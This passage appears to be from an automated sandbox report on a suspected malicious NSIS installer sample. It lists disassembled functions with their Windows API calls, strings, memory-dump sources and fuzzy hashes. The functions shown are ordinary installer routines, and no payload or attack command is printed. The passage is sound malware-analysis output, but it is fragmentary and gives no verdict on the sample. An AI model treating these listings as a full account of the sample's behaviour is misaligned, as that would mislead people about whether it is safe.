                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                  • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                  • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                  • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                  Function 6FEB24D8 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 6FEB1215: GlobalAlloc.KERNELBASE(00000040,6FEB1233,?,6FEB12CF,-6FEB404B,6FEB11AB,-000000A0), ref: 6FEB121D
                                                  • GlobalFree.KERNEL32(?), ref: 6FEB25DE
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB2618
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                  • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: aea3f9bdef6b0a02a91f9da5e0a5cda53072b8b999a790662ab82ce59607f314
                                                  • Instruction ID: bd44cc27482d7b0687c147e4e6048e8b8be3595b8668c6c80e66668a32b529c7
                                                  • Opcode Fuzzy Hash: aea3f9bdef6b0a02a91f9da5e0a5cda53072b8b999a790662ab82ce59607f314
                                                  • Instruction Fuzzy Hash: D441BD72109201EFCB028FA8CF95C6A7FBAEF9B314B20496EF50196250D735A9159B62
                                                  Function 0040521E Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                  • lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                  • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,758423A0), ref: 0040527A
                                                  • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                  • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                  • Opcode Fuzzy Hash: ffc7fd16b0850e8ca78275056b27aa311aff222ca9cd1cb1225c1906ca535124
                                                  • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                  Function 00404ACE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                  • GetMessagePos.USER32 ref: 00404AF1
                                                  • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                  • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                  • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                  • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                  Function 00402DBA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                  • MulDiv.KERNEL32(000D88A0,00000064,000D9EA0), ref: 00402E00
                                                  • wsprintfA.USER32 ref: 00402E10
                                                  • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402E0A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                  • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                  • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                  • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                  Function 6FEB22F1 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB2447
                                                    • Part of subcall function 6FEB1224: lstrcpynA.KERNEL32(00000000,?,6FEB12CF,-6FEB404B,6FEB11AB,-000000A0), ref: 6FEB1234
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6FEB23C2
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6FEB23D7
                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6FEB23E8
                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 6FEB23F6
                                                  • GlobalFree.KERNEL32(00000000), ref: 6FEB23FD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                  • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                  • String ID:
                                                  • API String ID: 3730416702-0
                                                  • Opcode ID: b6d8a3a11300a27b2ed9c77b39f3ba98894941baffa3bda2f8a4017618381fcb
                                                  • Instruction ID: 0c43d9b995ab9b9fef24bfe8711e5294c5a3f2b64253a960769285fbd5f413e8
                                                  • Opcode Fuzzy Hash: b6d8a3a11300a27b2ed9c77b39f3ba98894941baffa3bda2f8a4017618381fcb
                                                  • Instruction Fuzzy Hash: 8A41EF71908302DFD7118F648B40B6ABFF9FF56324F20496EF455CA6A0DB34A505CB62
                                                  Function 004027DF Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                  • GlobalFree.KERNEL32(?), ref: 0040288E
                                                  • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                  • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                  • Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
                                                  • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                  Function 00401D65 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D7E
                                                  • GetClientRect.USER32(?,?), ref: 00401DCC
                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DFC
                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
                                                  • DeleteObject.GDI32(00000000), ref: 00401E20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                  • Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
                                                  • Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
                                                  • Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54
                                                  Function 004049C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                  • wsprintfA.USER32 ref: 00404A6A
                                                  • SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                  • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                  • Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
                                                  • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                  Function 00405A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3355392842
                                                  • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                  • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                  • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                  • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                  Function 00402E3D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                  • GetTickCount.KERNEL32 ref: 00402E6E
                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                  • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                  • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                  • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                  Function 00405B7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Aftopningen Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                    • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,75843410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                    • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                  • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,75843410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                  • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75843410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75843410,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 3248276644-3355392842
                                                  • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                  • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                  • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                  • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                  Function 00405192 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 004051C1
                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00405212
                                                    • Part of subcall function 004041C7: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004041D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                  • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                  • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                  • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                  Function 00403875 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,75843410,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                  • GlobalFree.KERNEL32(00689268), ref: 00403896
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
